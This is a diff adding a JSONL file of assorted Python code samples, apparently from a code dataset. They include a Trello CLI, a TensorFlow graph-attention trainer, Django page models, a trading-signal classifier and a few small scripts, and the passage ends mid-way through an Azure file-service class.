diff --git "a/4391.jsonl" "b/4391.jsonl" new file mode 100644--- /dev/null +++ "b/4391.jsonl" @@ -0,0 +1,642 @@ +{"seq_id":"315188022","text":"# angel_encoder.py\n# Michael Gendron-Renaud\n# Project : ANGEL Discord Bot\n# September 28th 2018\nimport csv\n\nfrom typing import List\n\nDATA_ROOT = \"utils/discord_data/client.angel\"\n\n\ndef read_credentials() -> List[dict]:\n\n dict_list = []\n with open(DATA_ROOT, \"r\") as root:\n reader = csv.DictReader(root)\n for row in reader:\n dict_list.append(row)\n\n return dict_list\n","sub_path":"utils/angel_reader.py","file_name":"angel_reader.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642826341","text":"import requests\n\ndef read(auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params = auth_params).json()\n\n #Go along massive\n for column in column_data:\n #Get information about each task in column\n task_data = requests.get(base_url.format('lists') + '/' + column['id'] + '/cards', params = auth_params).json()\n print(column['name'],' ', len(task_data))\n if not task_data:\n print('\\t' + 'No tasks!')\n continue\n for task in task_data:\n print('\\t' + task['name'])\n\n return 1\n\n\ndef create_task(name, column_name,auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params = auth_params).json()\n\n #Find correct field in column\n for column in column_data:\n if column['name'] == column_name:\n #POST your param and add your task\n requests.post(base_url.format('cards'), data={'name': name, 'idList':column['id'], **auth_params})\n break\n return 1\n\ndef create_column(name,auth_params, base_url, board_id):\n #POST information and add column to board\n requests.post(base_url.format('boards') + \"/\" + board_id + \"/lists\", data={'name': name, **auth_params})\n\n return 1\n\n\n\ndef move(name, column_name,auth_params, base_url, board_id):\n #Get information about board's column\n column_data = requests.get(base_url.format('boards') + '/' + board_id + '/lists', params=auth_params).json()\n\n #Create list where programm put equal name of tasks\n tasks=[]\n info = \"Found >1 tasks! Please choose what's you mean\\n\"\n\n count = 0\n for column in column_data:\n column_task = requests.get(base_url.format('lists') + '/' + column['id'] + '/cards', params=auth_params).json()\n for task in column_task:\n\n # add equal tasks\n if task['name'] == name:\n count += 1\n info += str(count) + \". \" + str(task['id']) + \" - task_id in \" + column['name'] + \"\\n\"\n tasks.append(task['id'])\n\n #simple handler\n if(len(tasks) == 0):\n print('\\t'+'task not found')\n return 1\n elif len(tasks) == 1:\n task_id = tasks[0]\n else:\n #If programm find more than 1 equal task's name then it ask you to choose correct task\n print(info)\n task_id = tasks[int(input()) - 1]\n\n\n\n #change task location\n for column in column_data:\n if column['name']==column_name:\n #\n requests.put(base_url.format('cards') + '/' + task_id +\n '/idList', data={'value':column['id'],\n **auth_params})\n break\n\n return 1\n\ndef main():\n #ask base information for work\n base_url = \"https://api.trello.com/1/{}\"\n key = input(\"Enter your trello key\")\n token = input(\"Enter your trello token\")\n board_id = input(\"Enter board id\")\n auth_params = {\n 'key':key,\n 'token':token\n }\n decide = 1\n while decide:\n print(\"What do you want?\")\n print(\"Enter 1 to show board\")\n print(\"Enter 2 to create new task in column\")\n print(\"Enter 3 to create new column\")\n print(\"Enter 4 to move task to another column\")\n print(\"Enter 0 to exit\")\n decide = input()\n if decide == \"1\":\n read(auth_params, base_url, board_id)\n elif decide == \"2\":\n create_task(\n input(\"Enter name of task\"),\n input(\"Enter name of column(Where you add new task)\"),\n auth_params, base_url, board_id\n )\n elif decide == \"3\":\n create_column(\n input(\"Enter name of column\"),\n auth_params, base_url, board_id\n ),\n elif decide == \"4\":\n move(\n input(\"Enter name of task\"),\n input(\"Enter name of column\"),\n auth_params, base_url, board_id\n )\n elif decide == \"0\":\n break\n else:\n print(\"Please, enter 0, 1, 2, 3 or 4\")\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"trello.py","file_name":"trello.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"378798537","text":"import time\nimport numpy as np\nimport tensorflow as tf\nimport sklearn.preprocessing as pp\nfrom pathlib import Path\nimport awesomeml as aml\nimport sys\n\n# ************************************************************\n# global settings\n# ************************************************************\nckpt_file = Path('ckpt/gat/gat_cora.ckpt')\ndata_name = 'cora'\ndata_dir = Path('~/data/cora')\n\nnhop = 1\nif len(sys.argv) > 1:\n nhop = int(sys.argv[1])\nofname_acc = 'acc_gat_nhop_{}.txt'.format(nhop)\nif len(sys.argv) > 2:\n ofname_acc = str(sys.argv[2])\n\n# training params\nnb_epochs = 100000\n#nb_epochs = 2\npatience = 100\nlr = 0.005 # learning rate\nl2_coef = 0.0005 # weight decay\nhid_units = [8] # numbers of hidden units per each attention head in each layer\nn_heads = [8, 1] # additional entry for the output layer\nresidual = False\nnonlinearity = tf.nn.elu\nfea_drop = 0.6\ncoef_drop = 0.6\n\nprint('----- Opt. hyperparams -----')\nprint('lr: ' + str(lr))\nprint('l2_coef: ' + str(l2_coef))\nprint('----- Archi. hyperparams -----')\nprint('nb. layers: ' + str(len(hid_units)))\nprint('nb. units per layer: ' + str(hid_units))\nprint('nb. attention heads: ' + str(n_heads))\nprint('residual: ' + str(residual))\nprint('nonlinearity: ' + str(nonlinearity))\n\n\n# ************************************************************\n# prepare data\n# ************************************************************\ndata = aml.dataset.load_citation(data_dir, 'cora')\ntvt = aml.dataset.load_citation_tvt('cora')\n\nX = data['features']\nX = X / X.sum(axis=1).reshape((-1,1))\nY = pp.label_binarize(data['categories'], classes=list(set(data['categories'])))\nN = X.shape[0]\nP = X.shape[1]\nNC = Y.shape[1]\nassert N == Y.shape[0]\n\nadj = data['citation_graph'].todense()\nadj = adj + adj.T + np.eye(N)\nadj = (adj>0).astype(np.float32)\nbias = np.full_like(adj, -1e9)\nbias[adj>0] = 0\n\nmask_train = np.zeros(N, dtype=np.bool)\nmask_train[data['id_encoder'].transform(tvt['id'][tvt['label']=='train'])]=1\nmask_val = np.zeros(N, dtype=np.bool)\nmask_val[data['id_encoder'].transform(tvt['id'][tvt['label']=='validation'])]=1\nmask_test = np.zeros(N, dtype=np.bool)\nmask_test[data['id_encoder'].transform(tvt['id'][tvt['label']=='test'])]=1\n\nnb_nodes = N\nft_size = P\nnb_classes = NC\n\n# ************************************************************\n# construct computing graph\n# ************************************************************\nX = X[np.newaxis]\nY = Y[np.newaxis]\nbias = bias[np.newaxis]\nmask_train = mask_train[np.newaxis]\nmask_val = mask_val[np.newaxis]\nmask_test = mask_test[np.newaxis]\n\ntf.reset_default_graph()\nwith tf.name_scope('input'):\n ftr_in = tf.placeholder(dtype=tf.float32, shape=(1,N,P))\n bias_in = tf.placeholder(dtype=tf.float32, shape=(1,N,N))\n lbl_in = tf.placeholder(dtype=tf.int32, shape=(1,N,NC))\n msk_in = tf.placeholder(dtype=tf.int32, shape=(1,N))\n training = tf.placeholder(dtype=tf.bool, shape=())\n\nattns = []\nfor _ in range(n_heads[0]):\n attns.append(aml.layers.gat(\n ftr_in, bias_mat=bias_in, out_sz=hid_units[0],\n activation=nonlinearity, in_drop=fea_drop, coef_drop=coef_drop,\n residual=False, training=training))\n h_1 = tf.concat(attns, axis=-1)\n\nfor i in range(1, len(hid_units)):\n h_old = h_1\n attns = []\n for _ in range(n_heads[i]):\n attns.append(aml.layers.gat(\n h_1, bias_mat=bias_in, out_sz=hid_units[i],\n activation=nonlinearity, in_drop=fea_drop,\n coef_drop=coef_drop, residual=residual, training=training))\n h_1 = tf.concat(attns, axis=-1)\nout = []\nfor i in range(n_heads[-1]):\n out.append(aml.layers.gat(\n h_1, bias_mat=bias_in, out_sz=NC, activation=lambda x: x,\n in_drop=fea_drop, coef_drop=coef_drop, residual=False, training=training))\nlogits = tf.add_n(out) / n_heads[-1]\n\nlog_resh = tf.reshape(logits, [-1, NC])\nlab_resh = tf.reshape(lbl_in, [-1, NC])\nmsk_resh = tf.reshape(msk_in, [-1])\nmsk_resh = tf.cast(msk_resh, dtype=tf.float32)\nmsk_resh /= tf.reduce_mean(msk_resh)\nif hasattr(tf.nn, 'softmax_cross_entropy_with_logits_v2'):\n loss = tf.nn.softmax_cross_entropy_with_logits_v2(logits=log_resh, labels=lab_resh)\nelse:\n loss = tf.nn.softmax_cross_entropy_with_logits(logits=log_resh, labels=lab_resh)\nloss *= msk_resh\nloss = tf.reduce_mean(loss)\n\ntmp = tf.equal(tf.argmax(log_resh,1), tf.argmax(lab_resh,1))\ntmp = tf.cast(tmp, tf.float32)\ntmp *= msk_resh\naccuracy = tf.reduce_mean(tmp)\n\nvars = tf.trainable_variables()\nlossL2 = tf.add_n([tf.nn.l2_loss(v) for v in vars if v.name not in\n ['bias', 'gamma', 'b', 'g', 'beta']]) *l2_coef\nopt = tf.train.AdamOptimizer(learning_rate=lr)\ntrain_op = opt.minimize(loss+lossL2)\n\ninit_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n\n# ************************************************************\n# training\n# ************************************************************\nvlss_mn = np.inf\nvacc_mx = 0.0\ncurr_step = 0\n\nsaver = tf.train.Saver()\nckpt_file.parent.mkdir(parents=True, exist_ok=True)\nwith tf.Session() as sess:\n sess.run(init_op)\n\n for epoch in range(nb_epochs):\n _, loss_tr, acc_tr = sess.run(\n [train_op, loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_train,\n training: True})\n\n loss_vl, acc_vl = sess.run(\n [loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_val,\n training: False})\n print('Training: loss = %.5f, acc = %.5f | Val: loss = %.5f, acc = %.5f' % (loss_tr, acc_tr, loss_vl, acc_vl))\n\n if acc_vl >= vacc_mx or loss_vl <= vlss_mn:\n if acc_vl >= vacc_mx and loss_vl <= vlss_mn:\n vacc_early_model = acc_vl\n vlss_early_model = loss_vl\n saver.save(sess, str(ckpt_file))\n vacc_mx = np.max((acc_vl, vacc_mx))\n vlss_mn = np.min((loss_vl, vlss_mn))\n curr_step = 0\n else:\n curr_step += 1\n if curr_step == patience:\n print('Early stop! Min loss: ', vlss_mn, ', Max accuracy: ', vacc_mx)\n print('Early stop model validation loss: ', vlss_early_model, ', accuracy: ', vacc_early_model)\n break\n\n saver.restore(sess, str(ckpt_file))\n\n loss_ts, acc_ts = sess.run(\n [loss, accuracy],\n feed_dict={\n ftr_in: X,\n bias_in: bias,\n lbl_in: Y,\n msk_in: mask_test,\n training: False})\n\n with open(ofname_acc, 'a') as file:\n file.write('{} '.format(acc_ts))\n \n print('Test loss:', loss_ts, '; Test accuracy:', acc_ts)\n sess.close()\n","sub_path":"Final Project/Graph Attension - Liyu & Jiaying/code/gat.py","file_name":"gat.py","file_ext":"py","file_size_in_byte":6812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"627470701","text":"import numpy as np\nimport pandas as pd\nimport csv\nfrom pandas.core.frame import DataFrame\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\n\ntmp_lst = []\nwith open('data_v4.4.csv', 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n tmp_lst.append(row)\ndf = pd.DataFrame(tmp_lst[1:], columns=tmp_lst[0])\ndata = df[\"diff\"].tolist()\nnumbers = list(map(int, data))\n\nfor num_bins in range(2,31): #we require bin from 2 to 30\n n, bins, patches = plt.hist(numbers, num_bins, density=1, facecolor='blue', alpha=0.5)\n plt.xlabel('diff') \n plt.ylabel('Probability')\n plt.title(r'Histogram')\n plt.subplots_adjust(left=0.15)\n plt.savefig(\"%d.png\"%(num_bins))\n plt.cla()\n","sub_path":"320180939790-HuYue/homework_bin/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"368501256","text":"from setuptools import setup\nfrom os import path\nthis_directory = path.abspath(path.dirname(__file__))\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\n long_description = f.read()\nsetup(\n name='Fortnite-API-com',\n packages=['FortniteAPI'],\n version='0.0.5',\n license='MIT',\n description='Simple python wrapper for https://fortniteapi.com/',\n author='KarkaLT',\n author_email='karoliscd@gmail.com',\n url='https://fortniteapi.com/',\n keywords=['fortnite', 'stats', 'statistics', 'game'],\n install_requires=['requests==2.21.0'],\n long_description=long_description,\n long_description_content_type='text/markdown'\n)\n","sub_path":"pypi_install_script/Fortnite-API-com-0.0.5.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"348608498","text":"from sklearn.neural_network import MLPClassifier\nimport numpy as np\n\nfrom random import randint\n\nfrom MovingAverageCrossing import MovingAverageCrossing\nfrom TrendChecker import TrendChecker\nfrom FeatureSelection import FeatureSelection\n\nclass IntelligentMovingAverageCrossing:\n\n def __init__(\n self,\n featureSelection=False,\n nFeatures=3,\n nOutputs=1,\n architecture=(15,15),\n initialData=[],\n trainingData=[]\n ):\n\n self.neuralNetwork = MLPClassifier(\n activation='logistic',\n solver='lbfgs',\n alpha=1e-4,\n hidden_layer_sizes=architecture,\n random_state=1\n )\n\n if featureSelection:\n fs = FeatureSelection()\n self.features = fs.generateFeatures(nFeatures, initialData, trainingData)\n else:\n if nFeatures > 9:\n raise(ValueError(\"MaxFeature == 9 when featureSelection == False\"))\n mac1 = MovingAverageCrossing(5, 20)\n mac2 = MovingAverageCrossing(10, 20)\n mac3 = MovingAverageCrossing(5, 10)\n mac4 = MovingAverageCrossing(7, 20)\n mac5 = MovingAverageCrossing(14, 20)\n mac6 = MovingAverageCrossing(7, 10)\n mac7 = MovingAverageCrossing(7, 30)\n mac8 = MovingAverageCrossing(14, 30)\n mac9 = MovingAverageCrossing(7, 40)\n features = [mac1, mac2, mac3, mac4, mac5, mac6, mac7, mac8, mac9]\n self.features = features[:nFeatures]\n\n self.trend = False\n self.lastValue = (False, True)\n\n self.nOutputs = nOutputs\n self.trendChecker = TrendChecker()\n\n def setup(self, initialData, trainingData):\n # Setup\n longPeriods = []\n\n for f in self.features:\n longPeriods.append(f.longPeriod)\n longestPeriod = max(longPeriods)\n\n if len(initialData) < longestPeriod:\n raise(ValueError(\"Not enough initialization data.\"))\n\n for f in self.features:\n f.setup(initialData)\n\n # train prediction\n X = []\n for data in trainingData:\n x_i = []\n for f in self.features:\n x_i.append(f.onData(data)[0])\n X.append(x_i)\n X = np.array(X[1:])\n\n if self.nOutputs == 2:\n y = []\n y.append(self.trendChecker.identifyAllTrends(np.array(trainingData)))\n y.append(self.trendChecker.identifyAllReversions(np.array(trainingData)))\n y = np.matrix(y)\n y = y.getT()\n else:\n y = self.trendChecker.identifyAllTrends(np.array(trainingData))\n self.neuralNetwork.fit(X, y)\n\n def onData(self, data):\n featuresData = []\n for f in self.features:\n featuresData.append(f.onData(data)[0])\n featuresData = np.array(featuresData)\n featuresData = featuresData.reshape(1, -1)\n\n if self.nOutputs == 2:\n self.lastValue = self.neuralNetwork.predict(featuresData)\n self.lastValue = (self.lastValue[0][0], self.lastValue[0][1])\n else:\n trend = self.neuralNetwork.predict(featuresData)\n reversal = trend != self.trend\n self.trend = trend\n self.lastValue = (trend, reversal)\n\n return self.lastValue\n","sub_path":"generalized_code/IntelligentMovingAverageCrossing.py","file_name":"IntelligentMovingAverageCrossing.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"329925260","text":"#!/bin/python\nfrom bitz.factory import Factory\nimport argparse\n\ntry:\n import ConfigParser\nexcept ImportError:\n import configparser as ConfigParser\n\ndef get_args():\n \"\"\"\n Get input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='Account balance archive.')\n parser.add_argument('-config', action='store', dest='config',\n help='Configuration file path',\n default='')\n return parser.parse_args()\n\ndef main():\n # Get input arguments\n args = get_args()\n\n # Create factory\n factory = Factory(args.config)\n\n # Logger\n logger = factory.create_logger()\n\n # Starting...\n logger.info('[main]', \"Start to archive account balance...\")\n\n # Initialize objects\n instmt_list = factory.create_instrument_list()\n journal_db = factory.create_journal_database()\n realtime_db = factory.create_realtime_database()\n risk_manager = factory.create_risk_manager(instmt_list)\n market_data_feed = factory.create_market_data_feed(logger, is_basic=True)\n order_server = factory.create_order_server(logger, journal_db, realtime_db, risk_manager, market_data_feed, instmt_list)\n factory.create_exchanges(logger, order_server, market_data_feed)\n\n # Initialize exchange risk\n order_server.initialize_exchange_risk()\n\n # Initialize exchange positions\n order_server.initialize_exchange_positions()\n\n logger.info('[main]', \"Finished to archive account balance.\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"bitz/balance_archive.py","file_name":"balance_archive.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372021993","text":"\n#ImportModules\nimport ShareYourSystem as SYS\n\n#Define\nMyConditioner=SYS.ConditionerClass(\n\t)['#map@set'](\n\t\t{\n\t\t\t'MyInt':0,\n\t\t\t'MyStr':\"hello\"\t\n\t\t}\n\t)['#map@condition'](\n\t\t[\n\t\t\t(type,SYS.operator.eq,SYS.ConditionerClass),\n\t\t\t('MyInt',SYS.operator.eq,0),\n\t\t\t('MyStr',SYS.operator.eq,\"#direct:hello\")\n\t\t]\n\t)\n\n#print\nprint('MyConditioner.ItemizedMapValueVariablesList is ')\nprint(MyConditioner.ItemizedMapValueVariablesList)","sub_path":"Pythonlogy/ShareYourSystem/Standards/Itemizers/Conditioner/05_ExampleDoc.py","file_name":"05_ExampleDoc.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458628708","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom lstudio.common.models import BaseCommonModel, ContentPlaceholder\nfrom mptt.models import MPTTModel, TreeForeignKey\nfrom django.utils.translation import ugettext as _\nfrom filebrowser.fields import FileBrowseField\nfrom lstudio.media.models import ImageGallery\nfrom django.template.loader import render_to_string\nfrom adminsortable.models import Sortable\nfrom django.template import Template, Context\nfrom django.utils.safestring import mark_safe\nimport re\nfrom lstudio.menus.models import Menu\nimport math\nfrom HTMLParser import HTMLParser\nfrom django.db.models.signals import pre_save, post_save\nfrom django.core.urlresolvers import reverse\nfrom lstudio.common.models import reset_cache_handler, TEMPLATES_CHOICES\n\n\nclass InfoPage(BaseCommonModel, Sortable):\n published = models.BooleanField(verbose_name=_(\"Published\"), default=True)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255)\n\n text = models.TextField(verbose_name=_(\"HTML\"))\n\n image = FileBrowseField(verbose_name=_(\"Image\"), max_length=300, directory=\"images/\",\n extensions=[\".jpg\", \".png\", \".jpeg\"], blank=True, null=True)\n\n # image = models.ImageField(upload_to='images', blank=True, null=True)\n\n SHOW_OPTIONS_CHOICES = (\n # ('', _(\"Do not show\")),\n ('social_buttons', _(\"Social buttons\")),\n ('telephones', _(\"Telephones\")),\n ('without_additions', _(\"Without additions\")),\n ('date', _(\"Date\")),\n )\n show_in_main = models.CharField(verbose_name=_(\"Main page template\"), max_length=50, choices=SHOW_OPTIONS_CHOICES, null=True, blank=True, default='')\n\n url = models.URLField(verbose_name=_(\"Url\"), null=True, blank=True)\n\n def show_main_page_placeholder(self):\n if self.show_in_main:\n try:\n main_render_obj = ContentPlaceholder.objects.get(slug=u\"info_\"+self.show_in_main)\n return main_render_obj\n except ContentPlaceholder.DoesNotExist:\n pass\n\n return ''\n\n def __unicode__(self):\n return self.title\n\n class Meta(Sortable.Meta):\n verbose_name = _(\"Info page\")\n verbose_name_plural = _(\"Info pages\")\n\n\nclass ProjectPageTag(BaseCommonModel):\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255, null=True, blank=True)\n slug = models.SlugField(verbose_name=_(\"Slug\"), max_length=300)\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Project tag\")\n verbose_name_plural = _(\"Project tags\")\n\n\nclass PersonPosition(BaseCommonModel, Sortable):\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255, null=True)\n slug = models.SlugField(verbose_name=_(\"Slug\"), null=True, blank=True, max_length=300)\n text = models.TextField(verbose_name=_(\"Text\"), null=True, blank=True)\n POSITION_TYPES_CHOICES = (\n (\"salon\", _(\"Salon\")),\n (\"school\", _(\"School\")),\n )\n type = models.CharField(max_length=50, null=True, blank=True, default='salon', choices=POSITION_TYPES_CHOICES)\n\n def __unicode__(self):\n return self.title\n\n class Meta:\n verbose_name = _(\"Person position\")\n verbose_name_plural = _(\"Person positions\")\n\n\nclass BasePage(MPTTModel, BaseCommonModel, Sortable):\n parent = TreeForeignKey('self', verbose_name=_(\"Parent\"), null=True, blank=True, related_name='children')\n\n published = models.BooleanField(verbose_name=_(\"Published\"), default=True)\n\n title = models.CharField(verbose_name=_(\"Title\"), max_length=255)\n slug = models.SlugField(verbose_name=_(\"Slug\"), max_length=300)\n\n text = models.TextField(verbose_name=_(\"HTML\"))\n\n has_video = models.BooleanField(verbose_name=_(\"Has video\"), default=False)\n has_gallery = models.BooleanField(verbose_name=_(\"Has gallery\"), default=False)\n\n short_text = models.TextField(verbose_name=_(\"Short text\"), null=True, blank=True)\n\n def get_safe_title(self):\n return mark_safe(self.title)\n\n def get_safe_short_text(self):\n return mark_safe(self.short_text)\n\n def render_text(self):\n text_tpl = Template(self.text)\n content_msgs = {}\n galleries = {}\n menus = {}\n for msg in self.content_messages.all():\n content_msgs[msg.slug] = mark_safe(msg.text)\n for gallery in self.galleries.all():\n galleries[gallery.slug] = gallery.render()\n for menu in self.menus.all():\n menus[menu.slug] = menu.render()\n text_tpl_cntxt = Context({'content_messages': content_msgs,\n 'galleries': galleries,\n 'menus': menus})\n rendered_text_tpl = text_tpl.render(text_tpl_cntxt)\n\n return mark_safe(rendered_text_tpl)\n\n def render_short_text(self):\n text_tpl = Template(self.short_text)\n content_msgs = {}\n galleries = {}\n menus = {}\n for msg in self.content_messages.all():\n content_msgs[msg.slug] = mark_safe(msg.text)\n for gallery in self.galleries.all():\n galleries[gallery.slug] = gallery.render()\n for menu in self.menus.all():\n menus[menu.slug] = menu.render()\n text_tpl_cntxt = Context({'content_messages': content_msgs,\n 'galleries': galleries,\n 'menus': menus})\n rendered_text_tpl = text_tpl.render(text_tpl_cntxt)\n\n return mark_safe(rendered_text_tpl)\n\n meta_title = models.TextField(verbose_name=_(\"Meta title\"), null=True, blank=True)\n meta_description = models.TextField(verbose_name=_(\"Meta description\"), null=True, blank=True)\n\n image = FileBrowseField(verbose_name=_(\"Image\"), max_length=300, directory=\"images/\",\n extensions=[\".jpg\", \".png\", \".jpeg\"], blank=True, null=True)\n sausage_gallery = models.ForeignKey(ImageGallery, verbose_name=_(\"Sausage gallery\"), null=True, blank=True,\n related_name='sausage_pages')\n galleries = models.ManyToManyField(ImageGallery, verbose_name=_(\"Galleries\"), null=True, blank=True)\n menus = models.ManyToManyField(Menu, verbose_name=_(\"Menus\"), null=True, blank=True)\n content_messages = models.ManyToManyField(ContentPlaceholder, verbose_name=_(\"Content placeholders\"), null=True,\n blank=True)\n template = models.CharField(verbose_name=_(\"Template\"), max_length=255, choices=TEMPLATES_CHOICES,\n default='page.html')\n full_url = models.SlugField(verbose_name=_(\"Absolute url\"), blank=True)\n\n def get_absolute_url(self):\n ancestors = []\n for ancestor in self.get_ancestors(include_self=True):\n ancestors.append(ancestor.slug)\n\n full_url = u\"/\" + u\"/\".join(ancestors) + u\"/\"\n\n return full_url\n\n def __unicode__(self):\n return u\"{} ({})\".format(self.title, self.template)\n\n def save(self, *args, **kwargs):\n while self.__class__.objects.filter(slug=self.slug).exclude(pk=self.pk).count():\n match_url_obj = re.match(r'^(.+)-(\\d+)$', self.slug)\n\n if match_url_obj:\n next_int = int(match_url_obj.group(2)) + 1\n self.slug = match_url_obj.group(1) + u\"-\" + str(next_int)\n else:\n self.slug += u'-2'\n\n super(BasePage, self).save(*args, **kwargs)\n\n def get_breadcrumbs(self):\n ans = [{'url': reverse('index'), 'title': _(\"Main page\")}]\n ans += [{'url': x.get_absolute_url(), 'title': x.title}\n for x in reversed(self.get_ancestors(include_self=False, ascending=True))]\n ans += [{'url': None, 'title': self.title}]\n return ans\n\n # project page fields and methods\n project_tags = models.ManyToManyField(ProjectPageTag, null=True, blank=True)\n DOING_TEMPLATE_CHOICES = (\n ('projects/regular.html', _(\"Regular\")),\n ('projects/wide.html', _(\"Wide\")),\n ('projects/slider.html', _(\"Slider\")),\n )\n preview_template = models.CharField(verbose_name=_(\"Preview template\"), max_length=50,\n choices=DOING_TEMPLATE_CHOICES,\n default='doings/regular.html',\n null=True, blank=True)\n project_slider_gallery = models.ForeignKey(ImageGallery, null=True, blank=True, related_name='projects')\n\n def render_preview(self):\n return render_to_string(self.preview_template, {'object': self})\n\n @classmethod\n def get_tags(cls):\n return ProjectPageTag.objects.all().distinct('title')\n\n # staff page fields and methods\n first_name = models.CharField(verbose_name=_(\"First name\"), max_length=255, null=True, blank=True)\n last_name = models.CharField(verbose_name=_(\"Last name\"), max_length=255, null=True, blank=True)\n position = models.ForeignKey(PersonPosition, verbose_name=_(\"Position\"),\n null=True, blank=True, related_name='people')\n\n def get_stars(self):\n max_stars = 5\n pos_stars = self.personrating_set.filter(positive=True).count()\n neg_stars = self.personrating_set.filter(positive=False).count()\n\n all_stars = pos_stars + neg_stars\n if all_stars < 1:\n return xrange(max_stars)\n\n avg = float(pos_stars) / all_stars * 100.0\n\n return xrange(int(math.ceil(avg/(100/max_stars))))\n\n def get_full_name(self):\n return u\"{} {}\".format(self.first_name, self.last_name)\n\n # service page fields and methods\n price = models.CharField(verbose_name=_(\"Price\"), max_length=255, null=True, blank=True)\n\n class Meta(object):\n verbose_name = _(\"Page\")\n verbose_name_plural = _(\"Pages\")\n\n\nclass PersonRating(BaseCommonModel):\n positive = models.BooleanField(verbose_name=_(\"Positive\"), default=True)\n ip = models.IPAddressField(verbose_name=_(\"Ip address\"), null=True, blank=True)\n person = models.ForeignKey(BasePage, verbose_name=_(\"Person\"), null=True, blank=True)\n\n name = models.CharField(verbose_name=_(\"Name\"), max_length=255, null=True, blank=True)\n email = models.EmailField(verbose_name=_(\"Email\"), max_length=255, null=True, blank=True)\n text = models.TextField(verbose_name=_(\"Text\"), null=True, blank=True)\n\n class Meta:\n verbose_name = _(\"Person rating\")\n verbose_name_plural = _(\"People ratings\")\n\n\nclass MediaHTMLParser(HTMLParser):\n instance = None\n\n def __init__(self, instance=None):\n HTMLParser.__init__(self)\n self.instance = instance\n\n def save_instance(self, media_type='video'):\n if self.instance:\n if media_type == 'video':\n self.instance.has_video = True\n elif media_type == 'gallery':\n self.instance.has_gallery = True\n\n def handle_starttag(self, tag, attrs):\n if tag == 'video' or tag == 'flash' or tag == 'quicktime' or tag == 'iframe' or tag == 'shockwave':\n self.save_instance(media_type='video')\n\n def handle_endtag(self, tag):\n pass\n\n def handle_data(self, data):\n pass\n\n\ndef define_page_media(**kwargs):\n instance = kwargs.get('instance')\n parse = MediaHTMLParser(instance=instance)\n parse.feed(instance.text)\n\npre_save.connect(define_page_media, sender=BasePage)\n\napp_label = _(\"Pages\")\n\n\npost_save.connect(reset_cache_handler, sender=InfoPage)\npost_save.connect(reset_cache_handler, sender=ProjectPageTag)\npost_save.connect(reset_cache_handler, sender=PersonPosition)\npost_save.connect(reset_cache_handler, sender=BasePage)\npost_save.connect(reset_cache_handler, sender=PersonRating)","sub_path":"lstudio/pages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"312711257","text":"a=input(\"Primeiro valor:\")\nb=input(\"Segundo valor:\")\n#condiçao e ainda tem o elif=elseif\nif a>b :\n print (\"o primeiro numero é o maior\")\nif b>a:\n print (\"o segundo numero é o maior\")\n\nidade=input(\"Digite idade:\")\n\nif idade<=3 :\n print (\"Carro e novo\")\nelse:\n print (\" carro velho\")\nvel=input(\"Digite velocidade km/h:\")\nif vel>110 :\n multa=(vel-110)*5\n print(\"valor da multa e %5.2f\" %multa)\nelse:\n print(\"Multa nenhuma\")\n\n#repetiçao\nx=1\nwhile x<=3:\n print (x)\n x=x+1\n#numeros pares\nfim=input(\"digite o numero:\")\nx=1\nwhile x<=fim:\n if x%2==0 :\n print(\"%d e um numero par\" %x)\n x=x+1\n\ni=1\nfat=1\nn=input(\"Digite n:\")\nwhile i<=n:\n fat=fat*i\n i=i+1\nprint(\"Fat(%d) = %d\" %(n,fat))\n\n \n","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"48485161","text":"import json\nimport datetime\nfrom collections import deque\nfrom itertools import count\nfrom azure.storage.file import FileService, ContentSettings\n\nimport settings\n\n\n\ndef it_count(it):\n cnt = count()\n deque(zip(it, cnt), 0)\n return next(cnt)\n\n\nclass AzureFileService(object):\n def __init__(self, account_name, account_key, share_name):\n self.file_service = FileService(account_name=account_name, account_key=account_key)\n self.share_name = share_name\n\n\n def write_json_to_azure(self, data):\n try:\n self.file_service.create_file_from_text(\n share_name=self.share_name,\n directory_name=self.create_directory('data{}'.format(''.join(settings.TAGS).replace('#','_'))),\n file_name='{}_{}.json'.format(datetime.datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\"), json.loads(data)['id_str']),\n text=json.loads(data)['text'],\n 